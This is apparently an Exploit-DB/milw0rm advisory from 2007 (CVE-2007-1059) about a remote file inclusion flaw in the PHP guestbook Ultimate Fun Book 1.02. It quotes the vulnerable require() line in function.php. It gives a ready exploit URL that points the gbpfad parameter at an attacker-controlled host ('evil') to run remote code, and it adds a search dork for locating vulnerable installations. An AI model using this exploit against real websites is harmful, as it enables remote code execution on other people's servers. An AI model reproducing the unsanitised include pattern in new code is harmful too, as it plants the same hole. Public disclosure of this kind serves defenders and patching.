Ultimate Fun Book 1.02 function.php Remote File Include Vulnerability

2007-02-20T00:00:00
ID EDB-ID:3336
Type exploitdb
Reporter kezzap66345
Modified 2007-02-20T00:00:00

Description

Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability. CVE-2007-1059. Webapps exploit for php platform

                                        
                                            ****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contant= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*********thanx= x0r0n,str0ke,shakia***********
*****************************************

# milw0rm.com [2007-02-20]